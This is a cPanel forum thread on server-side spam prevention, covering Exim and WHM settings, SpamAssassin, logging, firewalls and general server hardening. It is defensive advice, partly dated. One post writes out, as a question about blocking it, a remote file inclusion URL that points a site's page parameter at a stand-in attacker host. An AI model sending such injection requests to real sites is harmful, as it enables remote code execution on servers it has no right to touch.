The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

SPAM PROTECTION: Guide

Discussion in 'General Discussion' started by Secret Agent, Jan 13, 2006.

  1. Secret Agent

    Secret Agent Guest

    Ok, I'm not actually creating a guide here but more (for sake of everyone who needs one and reads this) asking for everyone to chip into some advice / tips on spam prevention on the server. The below is some off the top of my head. Please reply with your tips and I will edit, add. I apologize if others may have created this, but it would be nice to compile into one large guide.


    Exim Dictionary Attack ACL: (by Chirpy)
    http://www.configserver.com/free/eximdeny.html

    WHM > Exim Config
    (enable all)

    Always set the Sender: header when the sender is changed from the actual sender.
    Verify the existance of email senders.
    Use callouts to verify the existance of email senders.
    Discard emails for users who have exceeded their quota instead of keeping them in the queue

    WHM > Tweak Settings
    (enable all these)

    BoxTrapper Spam Trap
    Include a list of Pop before SMTP senders in the X-PopBeforeSMTP header when relaying mai
    Silently Discard all FormMail-clone requests with a bcc
    SpamAssassin
    SpamAssassin Spam Box delivery
    The maximum each domain can send out per hour (reasonable number, say 50)
    Track the origin of messages sent though the mail server by adding the X-Source headers
    Default catch-all/default address behavior for new accounts (fail)
    Attempt to prevent pop3 connection floods (known to cause problems from my experience)
    Prevent users from parking/adding on common internet domains

    WHM > Tweak Security
    (enable SMTP tweak)

    WHM > Addon Modules
    (install)
    Spam Assassin
    ClamAV

    WHM > Server Manager
    Modify SMTP Port to 26 (will not work for a large number of ISP's who require you to use their SMTP server)

    Stop Receiving Spam with Cpanel
    http://www.webhostgear.com/index.php?art/id:299

    Stop PHP nobody Spammers
    http://www.webhostgear.com/index.php?art/id:232

    Stop Spam At The Server with Exim RBL
    http://www.webhostgear.com/index.php?art/id:175
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    You're mixing up incoming and outgoing spam prevention wich are completely different topics and require completely different solutions.

    For incoming spam:

    I would definitely not recommend the following at all, they will definitely exacerbate the problem. The first can break mail delivery. Using BoxTrapper has not value in a serverw-ide spam protection policy, will make the whole spam situation much much worse and can very quickly get your server on RBL's:

    Always set the Sender: header when the sender is changed from the actual sender.
    BoxTrapper Spam Trap

    This one has no bearing on spam protection at all:

    Modify SMTP Port to 26 (will not work for a large number of ISP's who require you to use their SMTP server)

    You can also use third-party tools, such as MailScanner which many find indispensable :)

    http://www.configserver.com/free/mailscanner.html

    Other things to do:

    Regularly check /etc/valiases/* and ensure no-one is using :blackhole: and substitute :fail: if they are. Make sure accounts that don't need a catchall alias are changed to :fail:

    For outgoing spam:

    I would also not recommend this, as it will definitely break some aspects of using sendmail:

    http://www.webhostgear.com/index.php?art/id:232

    Much better is to use extended exim logging through the exim configuration editor:

    log_selector = +all

    The SMTP Tweak is of no value for incoming spam and won't work at all if you have your own iptables configuration script installed, e.g. APF. You would need to separated configure iptables yourself (see other threads) to achieve that protection.

    Dissuade people very strongly indeed from using Auto Responders - they're another good way to get your server in an RBL

    Secure your server. An obvious thing, but yet another topic all of its own.

    Investigate enabling phpsuexec whereever possible.

    Install a firewall with incoming and outgoing port filtering and without any holes in it - beware of default settings and online guides that often open huge holes in SPI firewalls unnecessarily.

    Make sure you're continually checking all your server logs for suspicious activity throughout every day of the week. Make sure you read all your logs (or use the help of an app to pare them down) and understand them and act immediately on anything wrong.

    Make sure you have root emails routed to your mailbox and that you read them.

    Make sure that, if you do not use phpsuexec, that you set nobody's email to a real email address that is checked by someone and never simply route it off to /dev/null - you can get vital warning of spammer activity by monitoring it.

    Use the nobody header rewrite tweak so that the return-path is set correctly if a From header is specified in outgoing emails.

    Make sure all the server log files are rotated properly.

    Install a md5sum checking application such as tripwire.

    Never sit on old OS's such as RH7.3/RH9/FC1/FC2/FC3 - all of those are now dead and you should not be running them. Upgrade to an enterprise OS that is going to receive OS updates for years to come.

    Beware of using custom kernels. If you do use them, make sure you monitor kernel.org and recompile regularly. If you use vendor kernels, make sure you keep them up to date.

    Keep cPanel up to date.

    Be aware of every script your clients are upgrading and using and that they're keeping them up to date.

    The list goes on. Good spam protection = good server management and an intimate knowledge of how a server works, how your server works, exactly what is installed on it and what needs to be done on it on a regular basis, is essential.

    Last, but not least, bearing that last paragraph in mind, if you don't understand, do some work on the web and find out how - or hire someone who does. Don't stick your head in the sand, or believe that you can have a dedicated server and not have or use the skills of a full-time server admin.
     
  3. hpsmaster2

    hpsmaster2 Member

    Joined:
    Mar 1, 2005
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    Chirpy,

    How I can block this kind of injetction on mod_security

    http://customer.com/index.php?id=http://site-hacker.com/script.txt

    ?

    Thanks

     
  4. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    While the PHP Nobody article was effective back in the day, there are much better ways of dealing with this problem. As chirpy said, enabling extended logging is a must. Also you can do some very nice things with antivirus.exim as well as mod_security.
     
  5. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
  6. myweb

    myweb Well-Known Member

    Joined:
    Jun 18, 2002
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Tokyo
    Just one quick question.

    Does thie mean that :blackhole: does not work as intended? I did have a user who was complaining of continuously receiving spams even with the :blackhole: setting, and was looking for a solution.
     
  7. GordonH

    GordonH Well-Known Member

    Joined:
    Sep 6, 2001
    Messages:
    104
    Likes Received:
    0
    Trophy Points:
    16
    Boxtrapper is bad news.
    Results in you getting lots of spam complaints if it is turned on.

    I am very cheeky and redirect all my spam assassin flagged mail to a Gmail account for later review (on my own email accounts).

    I also have the customers server sset to not have the default account active when an account is set up, otherwise they fill up with junk and we end up with three back up copies of the junk as well.

    My worst day for spam was 1.4m items delivered to my inbox.
    Yes thats 1,400,000
    about a month ago.
    Most was filtered out, but after that weekend I did some serious tightening down.
     
  8. SonServers

    SonServers Well-Known Member

    Joined:
    Oct 24, 2001
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    Chirpy,

    Could you point me toward a "how to" for: "Use the nobody header rewrite tweak so that the return-path is set correctly if a From header is specified in outgoing emails." I'm not finding any details on that.

    That would be great for those users that have PHP mailer emails lists so they would get their own bounces.

    Thanks!
     
  9. djblamire

    djblamire Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    250
    Likes Received:
    0
    Trophy Points:
    16
    I agree - This would be very useful,

    Thanks
    Daniel
     
  10. spaceman

    spaceman Well-Known Member

    Joined:
    Mar 25, 2002
    Messages:
    481
    Likes Received:
    0
    Trophy Points:
    16
    http://forums.cpanel.net/showthread.php?t=43258
     
  11. SonServers

    SonServers Well-Known Member

    Joined:
    Oct 24, 2001
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    Thanks Spaceman. :)
     
  12. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    It does work as intended, it's just not the better option. :blackhole: and :fail: don't stop spam going to an existing pop3 or alias address.
     
  13. clintjohnson

    clintjohnson Registered

    Joined:
    Jun 11, 2007
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    nobody header rewrite tweak?

    What is the nobody header rewrite tweak?

    I want to dissallow persons from setting the FROM header when using mail() in PHP.

    My goal is to make sure my settings in /var/cpanel/maxemails are honored on mail generated from PHP.

    Clint.
     
  14. kamus

    kamus Member

    Joined:
    Jul 31, 2007
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Chile
    Thank's very usefull :)
    :)
     
Loading...

Share This Page